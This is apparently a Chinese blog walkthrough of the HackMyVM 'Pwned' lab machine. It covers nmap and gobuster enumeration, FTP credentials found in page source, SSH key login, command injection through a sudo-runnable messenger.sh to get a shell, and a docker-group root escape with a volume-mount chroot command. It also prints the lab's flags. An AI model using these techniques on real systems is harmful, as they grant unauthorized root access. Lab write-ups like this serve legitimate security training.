hmv[-_-]Pwned

Pwned

老样子vmware导入,升级,改Nat,打开以后:

image-20240316131846915

看上去一切正常,扫描一下:

image-20240316132219107

没扫到?

应该是因为本来是给virtualbox设计的,以1.0协议导出重新配置一下试试,还是扫不到网卡,难道不能扫?

打开virtualbox看看能不能扫到,依旧不行。。。重新配置一下vmware的靶场再扫一下:

sudo netdiscover -r 10.161.61.0/24

image-20240316135652220

依然无法扫描到,真的是很邪门,看来virtualbox的靶场配置到vmware上,还是有不少问题。

只能先进去看下地址了,参考渗透靶机扫描不到ip地址_扫不到靶场ip-CSDN博客

这里的师傅可能犯了一个小错误,群主大大ll104567发现了这一错误,grub的时候写rw single init=/bin/bash或者rw init=/bin/bash都行,而signie这一命令是不被支持的(主要是我没找到)。

image-20240317202909176

扫不出来。。。直接查flag吧:

fb8d98be1265dd88bac522e1b2182140
4d4098d64e163d2726959455d046fd7c

本题考察的是docker逃逸,回头去别的地方再尝试吧。

信息搜集

端口扫描

nmap -Pn -p- 10.161.216.116

image-20240317203119772

重新配置了一下:

nmap 10.161.216.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:52 EDT
Nmap scan report for 10.161.216.116
Host is up (0.00094s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

目录扫描

gobuster dir -u http://10.161.216.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
/nothing              (Status: 301) [Size: 318] [--> http://10.161.216.116/nothing/]
/server-status        (Status: 403) [Size: 279]
/hidden_text          (Status: 301) [Size: 322] [--> http://10.161.216.116/hidden_text/]
Progress: 220560 / 220561 (100.00%)

漏洞利用

查看一下敏感目录

http://10.161.216.116/nothing 

image-20240317205848126

image-20240317205910019

image-20240317205931263

再看一下别的:

http://10.161.216.116/hidden_text  

image-20240317210029288

/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

是一个字典,拿来扫一下:

gobuster dir -u http://10.161.216.116/ -w secret.dic -t 60
/pwned.vuln           (Status: 301) [Size: 321] [--> http://10.161.216.116/pwned.vuln/]

查看一下:

image-20240317210255985

尝试弱密码以及万能密码,无果,查看一下源代码,看看有没有东西。

image-20240317210427229

我擦原来在这里,尝试ftp查看文件:

ftp连接

ftp 10.161.216.116
ftpuser
B0ss_B!TcH

image-20240317210816905

拿到了私钥和用户名,尝试进行连接:

chmod 600 id_rsa
ssh ariana@10.161.216.116 -i id_rsa
# ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_rsa ariana@10.161.216.116 没用上不过记录一下

image-20240317211412442

查看基础信息,居然和kali的信息很像(id),哈哈哈!

image-20240317211623851

发现messenger.sh文件不需要selena用户认证即可运行。

运行一下,发现有三个用户,随便输入一个,弹出来了一个shell,扩展一下,我这边傻乎乎的以ariana先运行了一遍,哈哈哈:

# 以selena用户运行程序
sudo -u selena ./messenger.sh
# Welcome to linux.messenger 

# ariana:
# selena:
# ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash

# Sending message to selena 
whoami;id
# selena
# uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c "import pty;pty.spawn('/bin/bash');"
selena@pwned:/home$ 

查看id发现用户在docker组:

image-20240317212933458

尝试进行docker提权:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

获取flag!

image-20240317213155649

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇